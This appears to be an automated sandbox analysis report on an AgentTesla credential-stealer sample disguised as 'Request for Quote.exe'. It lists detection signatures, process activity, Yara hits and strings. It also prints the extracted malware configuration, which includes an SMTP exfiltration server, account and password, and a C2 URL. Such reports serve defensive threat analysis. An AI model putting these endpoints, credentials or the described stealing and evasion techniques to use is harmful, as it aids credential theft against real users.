Play interactive tour

Edit tour

Analysis Report Request for Quote.exe

Overview

General Information

Sample Name:	Request for Quote.exe
Analysis ID:	356719
MD5:	40cb5c4488fff6e0c040ff45cba91ecf
SHA1:	0ea670f7c180a52cd18c0630feea996dbf6dcf77
SHA256:	e9910e5698751eadaa69204411cd4cfe896148b60e71687ab0bd741e790d0488
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

Request for Quote.exe (PID: 2260 cmdline: 'C:\Users\user\Desktop\Request for Quote.exe' MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Request for Quote.exe (PID: 6376 cmdline: C:\Users\user\Desktop\Request for Quote.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 996 cmdline: 'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe' MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 6400 cmdline: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 5592 cmdline: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 5484 cmdline: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 1188 cmdline: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 6108 cmdline: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

Newapp.exe (PID: 6676 cmdline: 'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe' MD5: 40CB5C4488FFF6E0C040FF45CBA91ECF)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "zaYbvzrtpFoig4F", "URL: ": "http://0hH44dwVeXbULYg.com", "To: ": "jayz@flagmonkey.com.au", "ByHost: ": "mail.flagmonkey.com.au:587", "Password: ": "dB7Urg", "From: ": "jayz@flagmonkey.com.au"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Newapp.exe PID: 996	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Newapp.exe PID: 996	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Request for Quote.exe PID: 2260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Request for Quote.exe PID: 2260	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Newapp.exe PID: 6108	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Newapp.exe PID: 6108	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quote.exe PID: 6376	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Request for Quote.exe PID: 6376	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.Newapp.exe.4a1e1a0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Request for Quote.exe.3ecf990.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Request for Quote.exe.3ecf990.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Request for Quote.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.Newapp.exe.4b44450.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.Newapp.exe.4b44450.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.Newapp.exe.30abf98.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Request for Quote.exe.25e3b94.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
20.2.Newapp.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.Newapp.exe.49b6d80.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Request for Quote.exe.6376.5.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "zaYbvzrtpFoig4F", "URL: ": "http://0hH44dwVeXbULYg.com", "To: ": "jayz@flagmonkey.com.au", "ByHost: ": "mail.flagmonkey.com.au:587", "Password: ": "dB7Urg", "From: ": "jayz@flagmonkey.com.au"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: Request for Quote.exe	Virustotal: Detection: 28%			Perma Link
Source: Request for Quote.exe	ReversingLabs: Detection: 17%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Request for Quote.exe

Joe Sandbox ML: detected

Source: 5.2.Request for Quote.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 20.2.Newapp.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Request for Quote.exe	Unpacked PE file: 0.2.Request for Quote.exe.280000.0.unpack
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 14.2.Newapp.exe.a80000.0.unpack
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Unpacked PE file: 21.2.Newapp.exe.3f0000.0.unpack

Uses 32bit PE files

Show sources

Source: Request for Quote.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Request for Quote.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49740 -> 223.130.27.213:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49741 -> 223.130.27.213:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://0hH44dwVeXbULYg.com

Source: global traffic

TCP traffic: 192.168.2.5:49740 -> 223.130.27.213:587

Source: Joe Sandbox View

ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU

Source: global traffic

TCP traffic: 192.168.2.5:49740 -> 223.130.27.213:587

Source: unknown

DNS traffic detected: queries for: mail.flagmonkey.com.au

Source: Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Request for Quote.exe, 00000005.00000002.506806990.000000000332D000.00000004.00000001.sdmp, Request for Quote.exe, 00000005.00000003.469692196.0000000001174000.00000004.00000001.sdmp	String found in binary or memory: http://0hH44dwVeXbULYg.com
Source: Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: Request for Quote.exe, 00000005.00000002.506698485.000000000331F000.00000004.00000001.sdmp	String found in binary or memory: http://flagmonkey.com.au
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Request for Quote.exe, 00000005.00000002.506698485.000000000331F000.00000004.00000001.sdmp	String found in binary or memory: http://mail.flagmonkey.com.au
Source: Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	String found in binary or memory: http://qunect.com/download/QuNect.exe
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	String found in binary or memory: http://qunect.com/download/QuNect.exe&Operation
Source: Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	String found in binary or memory: http://uHcRbL.com
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	String found in binary or memory: http://validator.w3.org/check?uri=referer
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Request for Quote.exe, 00000000.00000003.233620527.0000000007A0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers$h
Source: Request for Quote.exe, 00000000.00000003.235037233.0000000007A0E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Request for Quote.exe, 00000000.00000003.236228951.0000000007A0E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers1
Source: Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Request for Quote.exe, 00000000.00000003.236763631.0000000007A0E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersb
Source: Request for Quote.exe, 00000000.00000002.253603269.00000000079DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: Request for Quote.exe, 00000000.00000002.253603269.00000000079DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comrsywa
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Request for Quote.exe, 00000000.00000003.232018672.0000000007A00000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn%u
Source: Request for Quote.exe, 00000000.00000003.232276547.00000000079FE000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/=v
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Request for Quote.exe, 00000000.00000003.237763152.0000000007A01000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000003.237538687.0000000007A01000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000003.233466028.00000000079D9000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: Request for Quote.exe, 00000000.00000003.233218699.00000000079DB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/g
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Request for Quote.exe, 00000000.00000003.233466028.00000000079D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/U
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
Source: Request for Quote.exe, 00000000.00000003.232949267.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/n
Source: Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: Request for Quote.exe, 00000000.00000003.235244456.0000000007A0E000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%$
Source: Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: Request for Quote.exe, 00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp, Request for Quote.exe, 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp, Newapp.exe, 0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: Newapp.exe, 0000000E.00000002.343532586.0000000001178000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\Request for Quote.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Newapp\Newapp.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 20.2.Newapp.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b55CF6D69u002d4E5Du002d4D68u002d8E88u002dF08D6C6E8534u007d/u0032F84C677u002d560Eu002d4E76u002d8A12u002d7C63DA2EDA80.cs

Large array initialization: .cctor: array initializer size 11991

Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02591028	0_2_02591028
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02592168	0_2_02592168
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_025917D0	0_2_025917D0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02592FE0	0_2_02592FE0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0259EC50	0_2_0259EC50
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02595318	0_2_02595318
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02595308	0_2_02595308
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_025950C8	0_2_025950C8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_025950B9	0_2_025950B9
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02595798	0_2_02595798
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_025904D2	0_2_025904D2
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02595590	0_2_02595590
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02595581	0_2_02595581
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02594A50	0_2_02594A50
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02594A60	0_2_02594A60
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02593E90	0_2_02593E90
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02593EA0	0_2_02593EA0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02590F21	0_2_02590F21
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02592F9A	0_2_02592F9A
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_02590F88	0_2_02590F88
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_045D0FC0	0_2_045D0FC0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_045D35E8	0_2_045D35E8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_045D3C48	0_2_045D3C48
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_045D0040	0_2_045D0040
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_045D0006	0_2_045D0006
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0A9842F0	0_2_0A9842F0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0A984BB0	0_2_0A984BB0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0A984BC0	0_2_0A984BC0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0A984300	0_2_0A984300
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB93238	0_2_0AB93238
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB9782E	0_2_0AB9782E
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB93E88	0_2_0AB93E88
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB95DE8	0_2_0AB95DE8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB95DD8	0_2_0AB95DD8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 0_2_0AB9C3F0	0_2_0AB9C3F0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_01416910	5_2_01416910
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_014161D8	5_2_014161D8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_01415BA0	5_2_01415BA0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0142822C	5_2_0142822C
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_0142EBD8	5_2_0142EBD8
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_014399A0	5_2_014399A0
Source: C:\Users\user\Desktop\Request for Quote.exe	Code function: 5_2_01436080	5_2_01436080
